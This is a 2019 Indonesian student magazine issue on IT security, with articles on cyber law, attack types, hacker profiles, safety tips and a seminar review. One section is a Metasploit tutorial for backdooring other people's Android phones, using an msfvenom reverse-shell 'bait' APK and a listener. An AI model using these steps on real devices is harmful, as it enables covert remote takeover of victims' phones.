CYMED IT SECURITY EDISI XXIV

Page 1

- Pencemaran Nama Baik dalam UU ITE - Teknik Network Attack - Tips Menghindari Serangan Hacker - Jenis - Jenis Hacker - Tutorial - Review Event Seminar “ IT Security “


Cyber Media Edisi XXIV - JUNI 2019

TIM REDAKSI Pelindung

: Dr.Safik Faozi,SH.M.Hum

Pembina

: Sri Mulyani, S.Kom.,M.Kom

Penanggung Jawab : Davis Danendra Sumarno Pimpinan Redaksi

: Laela Isna Fitrotunnisa

Editor

: Salma Rana Kamila S

Layout

: Wais Intan Sari

Redaksi

: Departemen Internal Internet Club


Cyber Media Magazine merupakan majalah

online

yang

diterbitkan

UKM

Internet Club Universitas

Stikubank Semarang. Bagi Perusahaan yang berminat untuk bergabung dan bekerjasama

dalam

kegiatan

Internet

Club

dapat

menghubungi Redaksi. Redaksi terbuka dan menerima artikel

atau

naskah.

Artikel

bisa

berupa

softcopy

atau hard copy dan dapat dikirim melalui alamat atau email. Alamat : Kampus Kendeng. Email

Jl. Kendeng V Bendan Ngisor Semarang : Cybermedia@internetclub.or.id


SALAM REDAKSI Assalamualaikum wr.wb Puji syukur kehadirat Allah SWT atas limpahan rahmat dan karunia Nya. Kami team redaksi majalah Cyber Media, kali ini menghadirkan sebuah majalah. Kami selalu berusaha untuk memberikan informasi yang bermanfaat, menarik dan mengembangkan ide - ide yang selalu memotivasi untuk berkreasi. Kali ini tim redaksi Cyber Media menghadirkan sebuah majalah dengan tema “ IT SECURITY � yang akan kami ulas dan sajikan menjadi info - info yang bermanfaat bagi para pembaca. Kami berharap dengan adanya majalah ini, dapat memberikan informasi yang bermanfaat. Dan meningkatkan daya minat baca masyarakat. Akhir kata, team Cyber Media mohon maaf apabila ada kesalahan baik perkataan maupun dalam penulisan. Kami menerima kritik dan saran dari para pembaca. Selamat membaca, Wassalamualaikum wr.wb Kritik & Saran : Cybermedia@internetclub.or.id


DAFTAR ISI IT SECURITY Sejarah Keamanan Komputer Pencemaran Nama Baik Dalam UU ITE Teknik Network Attack Hacker Yang Ditakuti Indonesia Tips Menghindari Serangan Hacker Jenis - Jenis Hacker Tutorial Exploit Android dengan Backdoor Apk (Metasploit) Jenis Virus Berbahaya Cerpen Review Event Seminar “ IT SECURITY “


IT SECURITY IT Security adalah keamanan yang diaplikasikan oleh komputer dan jaringan. Dalam perancangan IT Security, konsep yang paling efektif adalah dengan membuat dokumen yang mencakup semua informasi berdasarkan keamanan dan mencangkup pengguna (user) di bidang teknologi. IT Security juga dapat melindungi aset perusahaan ataupun aset yang penting.


Baru-baru ini dunia teknologi semakin canggih. Dengan adanya internet kita dapat menyimpan sebuah data digital dan dokumen melalui internet. Contohnya Google Drive yang menyediakan kapasitas memori yang bisa kita nikmati secara gratis sebesar 15GB. Dengan kemudahan yang ditawarkan terkadang pengguna tidak sadar bahwa data yang telah disimpan tidak 100% aman dari kejahatan pencurian data. IT Security berhubungan erat dengan suatu data entah itu berupa foto, dokumen, file, atau data pribadi yang hanya dapat diakses oleh pemilik data. Jika data di salah gunakan oleh orang yang tidak bertanggung jawab, bisa menimbulkan suatu efek yang negatif bagi pemilik data tersebut. IT Security bertujuan untuk mengamankan data, menstabilkan sistem, dan mendeteksi pencurian data.

AUTHOR : ENGGI ELINA SARI


SEJARAH KEAMANAN KOMPUTER


Pada awal di perkenalannya komputer kepada dunia yaitu komputer generasi pertama pada tahun (1946-1959), ukuran komputer sangatlah besar, langka, dan harganya sangat mahal. Oleh karena itu perusahaan yang memiliki komputer akan mencoba dengan cara terbaik untuk melindungi komputer tersebut. Keamanan komputer hanya salah satu aspek keamanan dari aset perusahaan. Pada masa itu keamanan komputer hanya difokuskan pada kasus seperti pencurian secara fisik terhadap perangkat komputer, pencurian atau perusakan terhadap gulungan pita, dan media lainnya yang merupakan bagian fisik dari komputer. Pada saat itu komputer tidak terhubung dengan jaringan internet, sehingga memang masalah keamanan hanya berfokus pada fisik dan lingkungannya saja.


Pada tahun 1970-an teknologi komunikasi mulai berubah dan cara berkomunikasi juga ikut berubah, pengguna yang berhubungan dengan perangkat komputer dan data dapat bertukar informasi dengan menggunakan jaringan telepon. Dengan terkoneksinya komputer pada jaringan telepon maka pengguna mampu mengakses komputer dari lokasi yang jauh. Yang semula hanya bisa bekerja pada satu tempat, sekarang dapat berhubungan dengan komputer lain di tempat yang berbeda. Semakin pesatnya perkembangan teknologi, kini komputer sudah merambat ke bidang bisnis dengan mulai menyimpan informasi secara online dan terkoneksi dengan jaringan secara bersama-sama dan dengan mainframe yang berisi database.


Sekarang data - data disimpan pada satu melainkan sudah database server yang jaringan internet.

penting tidak hanya perangkat keras, disimpan dalam terkoneksi dengan

AUTHOR : M. RIZA DARMAWAN


PENCEMARAN NAMA BAIK DALAM UU ITE


Pemberlakuan dan tafsir atas Pasal 27 ayat (3) UU ITE tidak dapat dipisahkan dari norma hukum pokok dalam Pasal 310 dan Pasal 311 KUHP. Demikian salah satu pertimbangan Mahkamah Konstitusi dalam putusan perkara No. 50/PUU-VI/2008 atas judicial review pasal 27 ayat (3) UU ITE terhadap UUD 1945. Mahkamah Konstitusi menyimpulkan bahwa nama baik dan kehormatan seseorang patut dilindungi oleh hukum yang berlaku, sehingga Pasal 27 ayat (3) UU ITE tidak melanggar nilai-nilai demokrasi, hak asasi manusia, dan prinsip - prinsip negara hukum. Pasal 27 ayat (3) UU ITE adalah Konstitusional.


Pasal 27 ayat (3) UU ITE “Setiap orang dengan sengaja dan tanpa hak mendistribusikan atau mentransmisikan kemudian membuat dapat diaksesnya informasi elektronik atau dokumen elektronik yang bermuatan penghinaan atau pencemaran nama baik�. Pasal 310 ayat (1) KUHP Barang siapa sengaja menyerang kehormatan atas nama baik seseorang dengan menuduhkan sesuatu hal, akan diancam dengan pidana penjara paling lama sembilan bulan atau pidana denda paling banyak empat ribu lima ratus rupiah.


Rumusan Pasal 27 ayat (3) Pasal 45 ayat (1) UU ITE yang tampak sederhana berbanding terbalik dengan sanksi pidana dan denda yang lebih berat dibandingkan dengan sanksi pidana dan denda dalam pasal-pasal penghinaan KUHP. Misalnya, seseorang yang terbukti dengan sengaja menyebarluaskan informasi elektronik yang bermuatan pencemaran nama baik seperti yang dimaksudkan dalam Pasal 27 ayat (3) UU ITE akan dijerat dengan Pasal 45 Ayat (1) UU ITE, sanksi pidana penjara maksimum 6 tahun atau denda maksimum 1 milyar rupiah.


Pasal 45 UU ITE Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 27 ayat (1), ayat (2), ayat (3), atau ayat (4) dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp1.000.000.000,00 (satu miliar rupiah). Masih ada pasal lain dalam UU ITE yang terkait dengan pencemaran nama baik dan memiliki sanksi pidana dan denda yang lebih berat lagi, perhatikan pasal 36 UU ITE.


Pasal 36 UU ITE “Setiap orang dengan sengaja dan tanpa hak atau melawan hukum melakukan perbuatan sebagaimana yang dimaksud dalam Pasal 27 sampai Pasal 34 yang mengakibatkan kerugian bagi orang lain� Misalnya, seseorang yang menyebarluaskan informasi elektronik yang bermuatan penghinaan dan/atau pencemaran nama baik dan mengakibatkan kerugian bagi orang lain akan dikenakan sanksi pidana penjara maksimum 12 tahun dan/atau denda maksimum 12 milyar rupiah (dinyatakan dalam Pasal 51 ayat (2)).

AUTHOR : DIMAS ARIZAL AKBAR


TEKNIK NETWORK ATTACK


Berikut ini adalah jenis-jenis dari Network Attack : BotNet BotNet berasal dari dua kata yaitu Robot dan Network. BotNet merupakan komputer yang telah terinfeksi oleh software jahat (malware). BotNet ini bisa dipakai untuk menjaga keamanan kanal Internet Relay Chat (IRC), mengirimkan surel spam, atau bisa juga dijadikan serangan DDos.


SMB Attack / MitM Server Message Block (SMB) Attack atau bisa disebut SMB Relay Attack atau istilahnya Man-in-the-Middle (MitM), merupakan jenis serangan yang bergantung pada autentikasi Versi 2 NTLM yang biasanya digunakan oleh sebagian besar perusahaan. SMB Attack ini dibagi menjadi 2 yaitu SMB Relay dan SMB Relay 2, teknik ini digunakan untuk mencuri data autentikasi dari jaringan lalu lintas data, dengan cara user teknik ini berada ditengahtengah antara target dengan server.


Spoofing Dalam konteks teknologi informasi, khususnya bidang keamanan jaringan. Spoofing Attack adalah situasi dimana seseorang berhasil menyamar sebagai orang lain dengan memalsukan data dirinya untuk mendapatkan sesuatu secara ilegal, yang hanya menguntungkan dirinya atau organisasinya. Buffer Overflow Buffer Overflow merupakan sebuah kelemahan yang dimanfaatkan oleh hacker dalam sebuah sistem. Metode ini merupakan salah satu yang digunakan hacker untuk mengeksploitasi sebuah sistem komputer yang memiliki kelemahan pada salah satu aplikasi yang digunakan oleh sistem tersebut.


Trojan Horse Dalam security komputer mendefinisikan sebuah software berbahaya yang dapat merusak sebuah sistem atau jaringan. Tujuan Trojan adalah untuk memperoleh informasi dari si target dan untuk mengendalikan si target tersebut. Social Engineering Dalam Network Attack, tak hanya teknik programming saja yang digunakan, ada jenis lain dari Network Attack yaitu menggunakan kelemahan manusia. Social Engineering adalah para ahli sosial yang mengeksploitasi kelemahan psikologi manusia. Mereka menggunakan berbagai media, penyerang langsung bertanya kepada target tentang username dan password target.


AUTHOR : KHARIS MUQOWAM


HACKER YANG DITAKUTI INDONESIA


Jim Geovedi Jim Geovedi adalah hacker berkebangsaan dan bertanah air Indonesia. Jim bukan hacker Indonesia yang meretas toko online atau situs negara biasa, tetapi Jim mampu meretas satelit. Peretasan satelit ini dilakukan bukan atas dasar iseng namun karena Ia pernah menjadi pembicara atas isu keamanan satelit pada tahun 2006. Jim mencoba mempelajari sistem dan proses kerja satelit hingga akhirnya Ia dapat melumpuhkan satelit tersebut. Bukan hanya meretas, Jim bahkan mengubah arah serta menggeser satelit yang diretas.


Kang Onno (Onno W. Purbo) Kang Onno seorang pakar dalam dunia Teknologi Informasi dari ITB Bandung dengan jurusan Teknik Elektro. Setelah lulus, Kang Onno melanjutkan pendidikannya ke Kanada melalui jalur beasiswa PAU-ME. Kang Onno merupakan hacker yang paling dihormati di Indonesia. Kang Onno aktif mengisi seminar nasional. Ia juga turut mengajak orang-orang untuk menjadi hacker yang baik atau disebut hacker white hat. Salah satu bukti kehebatan Kang Onno adalah Ia mampu menciptakan antena Wi-Fi hanya dari sebuah kaleng.


Hmei7 Hacker ini menjadi perhatian banyak pihak di seluruh dunia. Hacker yang satu ini sempat membuat heboh karena berhasil mengacak-acak situs blogging, Wordpress. Ia mampu meretas 5.000 situs dalam 2 hari. Menurut pengakuannya, total situs yang Diretas adalah 40.000 lebih situs.

AUTHOR : MEYKE SAPUTRI


TIDAK INGIN MENJADI KORBAN HACKER? INILAH TIPS MENGHINDARI SERANGAN HACKER


1. Jangan membagikan data pribadi Anda sembarangan Tips pertama adalah jaga data pribadi Anda dengan aman ketika menggunakan internet. Cara termudah untuk mengetahui apakah website tersebut aman atau tidak, adalah dengan melihat huruf “s� di URL web yang Anda kunjungi. Website yang aman memiliki URL awal https://, sementara jika memiliki URL http:// berarti website tersebut tidak aman. 2. Matikan jaringan Wi-Fi atau Bluetooth ketika tidak digunakan Tanpa Anda sadari, serangan hacker dapat juga terjadi melalui jaringan Wi-Fi atau Bluetooth yang terus-menerus dinyalakan. Jadi, pastikan Wi-Fi dan Bluetooth dinon aktifkan ketika sedang tidak dipakai.


3. Gunakan Virtual Private Network (VPN) VPN merupakan sebuah layanan koneksi yang memungkinkan Anda untuk mengunjungi sebuah website dengan aman dan private. VPN bekerja dengan cara mengubah jalur koneksi melalui server dan menyembunyikan pertukaran data yang terjadi. Dengan begitu, hacker akan merasa sulit untuk mengendus informasi data Anda atau mengetahui apa yang sedang Anda lakukan di internet. 4. Gunakan jawaban pertanyaan keamanan palsu Hal tersebut dikarenakan kehadiran sebuah website bernama White pages yang dapat mencari tahu nama, nomor telepon, atau bahkan alamat rumah seseorang, jadi disarankan membuat jawaban palsu.


5. Gunakan password yang kompleks Gunakan password yang kompleks seperti campur angka, huruf capital, maupun simbol agar risiko serangan hacker semakin rendah. 6. Jangan gunakan password yang sama untuk semua akun Karena jika salah satu akun terkena serangan hacker, maka tidak menutup kemungkinan semua akun Anda akan ikut di retas.

AUTHOR : AYU KUSUMA DEWI


JENIS - JENIS HACKER Nomor 5 Paling Berbahaya

Berikut ini adalah jenis-jenis hacker berdasarkan aktivitasnya: 1. White Hat Hacker Hacker yang memegang teguh standar etika, akses ke sistem komputer dilakukan bukan untuk tujuan merugikan, tetapi untuk menguji sistem ketahanan. Jenis hacker ini senang mempelajari banyak sistem dan banyak yang menjadi konsultan keamanan.


2. Hacktivist Hacker Perpaduan antara hacker dan activist. Jenis hacker ini menggunakan kemampuannya untuk menyebarkan pesan-pesan tertentu (Agama, Politik, Ideologi, dll). 3. Grey Hat Hacker Jenis hacker yang memiliki prinsip ganda dalam etika. Dalam artian Grey Hat mewakili jalan tengah antara White Hat dan Black Hat. Grey Hat bisa memiliki etika dalam menembus sistem, tetapi juga terkadang melanggar aturan hukum.


4. Script Kiddie Hacker Istilah untuk peretas yang tidak serius yang diyakini menolak prinsip-prinsip etika yang dipegang oleh peretas professional. Script Kiddies dapat menggunakan program peretasan yang ditulis orang lain atau peretas lain, karena mereka tidak memiliki pengetahuan dalam menulis script sendiri 5. Black Hat Hacker Jenis hacker yang menerobos sistem keamanan komputer untuk melakukan kerusakan atau merugikan beberapa pihak tertentu atau bisa disebut dengan cracker. AUTHOR : IDA BAGUS INDRA P



TUTORIAL EXPLOIT ANDROID DENGAN BACKDOOR APK (METASPLOIT)


TUTORIAL

Exploit android dengan backdoor apk (metasploit) Di sini kami akan berbagi cara hacking android orang lain Kami menggunakan OS KALI LINUX dan framework Metasploit, Anda juga bisa menggunakan OS windows dengan cara menginstall metasploit framework terlebih dahulu.


TUTORIAL

Langkah pertama, cek Ip address Anda

Di sini ip address kami adalah 192.168.1.101.


TUTORIAL

Berikutnya kita buat backdoor nya (umpan). Ini berfungsi sebagai umpan untuk target.

Ketik msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444 R > umpan.apk Atur lhost sesuai ip address Anda, atur lport 4444, dan atur nama file sesuai keinginan Anda, di sini kami menggunakan umpan. Jika sudah, tekan Enter.


TUTORIAL

Lalu akan keluar file umpan.apk


TUTORIAL

Setelah itu, kita masuk ke metasploitnya dengan perintah msfconsole Jika di windows Anda bisa menggunakan cmd dan ketikkan perintah c://metasploit/console.bat

Setelah itu akan muncul seperti ini.


TUTORIAL

Ketikkan use exploit/multi/handler

Lalu ketik set payload android/meterpreter/reverse_tcp


TUTORIAL

Ketik show options untuk melihat opsi.

Dan ketikkan Set lport=192.168.1.101 (isi sesuai ip address Anda) Set lport=4444


TUTORIAL

Dan ketikkan exploit (mengeksekusi target)

untuk

meng-exploit

Nah jika sudah berhasil masuk nanti akan terlihat seperti ini.


TUTORIAL

Anda bisa mengetikkan sysinfo untuk melihat versi android target.

Disini versi android target adalah 5.1

AUTHOR : FARIZ AKBAR


JENIS VIRUS BERBAHAYA


Virus merupakan program komputer berbahaya yang menakutkan bagi para pengguna komputer. Karena virus dapat menyerang sistem komputer, bahkan dapat menghapus data - data penting di komputer. Berikut adalah virus yang paling berbahaya:

1. Nimda Virus ini muncul pertama kali pada September 2001. Nama virus ini diambil dari kata “Admin�, hanya saja diejanya secara terbalik. Nimda menyebar lewat media internet seperti lewat email, web, file sharing, atau memanfaatkan celah keamanan yang ada pada server Web Microsoft Internet Information Services (IIS).


2. Storm Worm Storm Worm adalah virus jenis trojan yang mematikan dan sangat merusak. Storm Worm pertama kali muncul tahun 2006 dan menyebar lewat email yang di dalamnya berisi sebuah link. Saat itu banyak sekali para pengguna komputer yang mengeluh, bahwa mereka menerima email spam dengan pesan “230 dead as storm batters Eropa�. Jika link tersebut di klik, maka virus akan menginfeksi komputer dan memungkinkan komputer dikendalikan dari jarak jauh untuk menyebarkan email spam di internet.


3. Conficker Conficker merupakan virus yang sangat berbahaya karena penyebarannya sangat cepat. Virus ini juga dikenal dengan nama Downup, Downadup dan virus Kido. Conficker menyebar melalui sistem operasi Microsoft Windows, paling banyak menyerang Windows XP. Laman The Guardian memprediksi bahwa virus Conficker telah menginfeksi 3,5 juta PC pada 2009. Angka infeksi ini bertambah menjadi hampir 9 juta PC selang sehari kemudian

AUTHOR : REZA


CERPEN


Perkenalkan namaku Tegar mahasiswa Teknik Informatika di salah satu Universitas Favorit di Jawa Tengah. Awalnya aku diajak oleh temanku untuk mengambil jurusan Teknik Informatika. Setelah perkuliahan di mulai, aku mulai mengetahui sedikit tentang IT. Aku pun memutuskan untuk mendaftar di salah satu organisasi yang ada di Universitasku, dan aku tertarik untuk mendaftar salah satu UKM yang berhubungan langsung tentang IT. Satu semester aku lewati dan akupun merasa bahwa pelajaran tentang IT semakin sulit, karena seiring perkembangan zaman yang membuat teknologi semakin canggih. Dan akupun mulai gelisah dengan bidangku ini, aku mulai merasa bahwa aku salah jurusan. Dan aku bertanya kepada temanku mengenai kegelisahan ini.


“Budi, aku mulai gelisah dengan bidangku ini. Aku mulai pusing dengan dunia IT, aku merasa aku salah jurusan”. kataku. “Kenapa? Apa yang bikin kamu salah jurusan gar?” balasnya. “Aku merasa hanya aku yang tidak banyak tahu tentang IT bud. Aku bahkan tidak bisa mengikuti materi yang dibuat oleh dosen.” ”Hmmm..” sahut Budi. “Males ah cerita sama kamu, nggak ada solusi!” balasku. “Hahaha.. ehh ikut seminar IT Security yuk?” ajak Budi. “Boleh deh. Sekalian aku mau belajar tentang IT Security, kapan seminarnya?’ tanyaku.


“Hari Sabtu, tanggal 8 Juni, tempatnya di lantai 9 kampus kita� balas Budi. Akhirnya semangatku untuk belajar IT muncul kembali dan kebetulan aku tidak tahu banyak tentang keamanan jaringan. Dan ini saatnya seminar telah tiba, selama acara seminar berlangsung aku mendengarkan setiap materi yang diberikan oleh pembicara dengan teliti. Setelah acara seminar selesai, aku mulai memahami bahwa keamanan itu sangat penting.

AUTHOR : MARCELL PUTRA RIYAWAN


REVIEW EVENT SEMINAR “ IT SECURITY “


Semarang (4/05) Internet Club mengadakan acara Seminar “IT Security� dengan tema How Hacker Works bertempat di Ruang D.62 Universitas Stikubank Kendeng Jalan Kendeng V Bendan Ngisor Semarang. Seminar ini diisi oleh empat narasumber yang telah mengerti bidangnya yaitu Anggi Elanda selaku Founder Serverhack Organization, Slamet Riyadi selaku Pengamat UU ITE, Galla Zulhy selaku Web Security, serta Mualiful Mizan selaku Diskominfo IT Security.


Pembukaan diawali oleh Sambutan dari ketua UKM yaitu Davis Danendra Sumarno selanjutnya sambutan ketua acara seminar IT Security oleh Wira Dwi Susanto. Pembukaan juga diisi sosialisasi ICONCLASS oleh Uswatun Utami selaku koordinator ICONCLASS dan acara ini dipandu oleh dua MC yaitu Dilan Allya dan Artin Milleani Sesi yang pertama disampaikan oleh Anggi Elanda selaku Founder Serverhack Organization dalam kesempatan kali ini beliau menjelaskan tentang Cyber Crime. Dimana Cyber Crime tersebut terdiri dari Domain/DNS Hijacking & Cyber Squatting, Web Deface, Credit Card Fraud, Virus Spam & Phising, Cyber Terorism, Data Privacy, IP Infringement, dan Cyber Pornography. Salah satu materi yang disampaikan yaitu mengenai Cyber Terrorism merupakan tindakan terror terhadap system komputer, jaringan dan basis data dari informasi yang tersimpan dalam komputer


Tak hanya itu, beliau menjelaskan bahwa secara umum hacker dapat dibagi menjadi dua kategori, yaitu White hat yaitu hacker yang beretika, hacker ini masuk dalam system untuk menunjukan system yang rentan dalam hal keamanan atau memberi awareness pada suatu celah system. Kemudian terdapat Black hat merupakan kebalikan dari White hat yaitu melakukan serangan dan pencurian data berbahaya yang dapat merugikan suatu pihak.Selain itu, beliau juga mengingatkan untuk senantiasa beretika dalam internet. Disela – sela materi Anggi Elanda memberi sebuah kuis yang dapat diakses melelui sebuah link, yang ternyata link tersebut merupakan contoh nyata bagaimana Phising biasanya terjadi.


Selanjutnya sesi kedua oleh Slamet Riyadi selaku pengamat UU ITE. Beliau menjelaskan apa saja yang dapat membuat kita terjerat pada UU ITE. Salah satunya terdapat pada UU no 11 tahun 2008 tentang UU ITE pasal 30 yang pada intinya, Setiap orang yang dengan sengaja dan tanpa hak tau melawan hukum mengakses Komputer atau system elektronik dengan cara apapun dengan tujuan untuk memperoleh informasi Elektronik dan atau dokumen Elektronik, serta dengan cara melanggar, menerobos, melampaui, atau menjebol system pengaman. Pelanggar UU ini dapat dikenai pidana penjara paling lama 10 tahun dan denda 10 miliyar rupiah. Terdapat juga pasal 45B UU ITE yaitu setiap orang yang dengan sengaja dan tanpa hak mengirimkan informasi elektronik atau Dokumen Elektronik yang berisi ancaman kekerasan atau menakut – nakuti yang ditujukan secara pribadi dapat dikenakan pidana kurungan penjara paling lama 4 tahun atau denda maksimal 750 juta.


Sepatah kata terakhir pak Slamet Riyadi dalam sesi ini “Jempolmu Harimau-mu� bijak dalam menggunakan internet, bijak dalam membuat status di sosmed. Kemudian sesi terakhir yang dibawakan oleh dua pembicara sekaligus, Galla Zulhy selaku Web Security, dan Mualiful Mizan selaku Diskominfo IT Security. Kesempatan pertama oleh Mualiful Mizan, beliau menjelaskan tentang apa itu IT Security. IT Security adalah sebuah keamanan siber yang mencegah akses ilegal dari hacker yang mencoba masuk ke dalam server, jaringan komputer, ataupun data. Beliau juga menjelaskan fase – fase hacking, seperti footprinting, valuelability exploitation, privilege escalation, erase tracks, maintaining access, dan DDOS. Tak hanya itu, beliau juga mendemontrasikan secara langsung bagaimana cara exploit Microsoft ds (port 445).


XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah - olah datang dari situs tersebut. Terdapat dua jenis XSS, yaitu reflected nonperistant dan stored persistent. Tak sampai situ, beliau juga mendemontrasikan bagaimana cara menggunakan SQL Injection. Setelah semua pemateri menyampaikan materi nya, MC mengajak peserta untuk bermain game Kahoot. Kemudian dilanjutkan dengan sesi tanya jawab oleh peserta kepada pembicara. Peserta sangat antusias pada sesi ini dengan melontarkan pertanyaan – pertanyaan kepada seluruh pembicara. Diakhir acara ada pemberian hadiah kepada para peserta, serta pembagian kenang - kenangan dari Internet Club kepada pembicara, yang kemudian dilanjut dengan foto bersama. AUTHOR : DAFFA ARYAGUNA



INGIN PASANG IKLAN DI CYBER MEDIA? Hubungi : Dilan Allya Barqi (Marketing) Telp.08988154880


NOTE


EDISI SEBELUMNYA

@CyberMediaMagz @CyberMediaMagz CyberMediaMagz cybermedia@internetclub.or.id issuu.com/cybermediamagz


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.